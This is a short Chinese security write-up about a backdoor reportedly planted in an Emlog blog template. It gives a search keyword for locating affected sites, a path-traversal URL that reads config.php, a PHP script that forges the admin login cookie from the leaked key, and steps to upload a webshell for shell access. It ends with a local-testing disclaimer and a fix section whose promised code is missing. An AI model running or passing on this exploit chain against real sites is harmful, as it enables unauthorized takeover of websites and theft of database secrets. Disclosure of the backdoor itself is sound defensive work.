0x01 前言
明月浩空,一个Emlog模板的作者,因为在自己设计的模板中,故意安放网站木马后门漏洞,导致模板的使用者遭黑客恶意入侵风险。
0x02 搜索关键词
/content/templates/limh.me
0x03 已知后门地址
view-source: + 域名 + /content/templates/limh.me/function/image.php?url=../../../../config.php
这是一个任意文件内容读取的后门 可以读取 数据库等重要信息,这里我们利用计算Emlog 的Cookie来进行伪造管理员登录。
0x04 计算Cookie脚本
<?php
$time=time() + 60 * 60 * 24 * 30 * 12;
$key = hash_hmac('md5', 'admin|' . $time, '*****************************'); //这个是Key,admin为要欺骗的管理名
$hash=hash_hmac('md5', 'admin|' . $time, $key); //admin为要欺骗的管理名
$cookie='admin|' . $time."|".$hash; //admin为要欺骗的管理名
echo $cookie;
setcookie("*****************************",$cookie); //这个是cookiename
?>
计算出后,进入后台 默认地址 /admin 利用火狐的插件Cookie Edit加入Cookie Name是 AUTH_COOKIE_NAME 值为计算的
然后刷新网页 伪造cookie成功
然后上传插件地方上传大马,进行Getshell
本文章演示仅是本地搭建,请勿对非授权网站进行测试。
0x05 修复方法
将file_get_contents()替换成curl函数,※前提是PHP必须开启curl扩展curl函数呢,比file_get_contents()效率高,速度快,性能好,而且不会读取本地文件。以下是修复好的完整代码